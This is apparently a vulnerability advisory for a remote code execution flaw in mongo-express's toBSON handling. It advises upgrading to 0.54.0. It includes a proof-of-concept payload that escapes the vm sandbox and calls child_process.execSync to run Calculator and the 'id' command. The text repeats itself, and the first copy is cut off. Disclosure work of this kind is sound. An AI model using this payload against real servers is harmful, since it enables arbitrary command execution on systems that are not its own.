## Overview [mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3 Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment. ## PoC by Jonathan Leitschuh ``` # MacOS this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator') it('should not be executable', function () { const test = ` this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString()) `; const result = bson.toBSON(calculatorTest); }); ``` ## Remediation Upgrade `mongo-express` to version 0.54.0 or higher. ## References - [GitHub...
## Overview [mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3 Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment. ## PoC by Jonathan Leitschuh ``` # MacOS this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator') it('should not be executable', function () { const test = ` this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString()) `; const result = bson.toBSON(calculatorTest); }); ``` ## Remediation Upgrade `mongo-express` to version 0.54.0 or higher. ## References - [GitHub PR](https://github.com/mongo-express/mongo-express/pull/522) - [GitHub Security Advisory](https://github.com/mongo-express/mongo-express/security/advisories/GHSA-h47j-hc6x-h3qq)
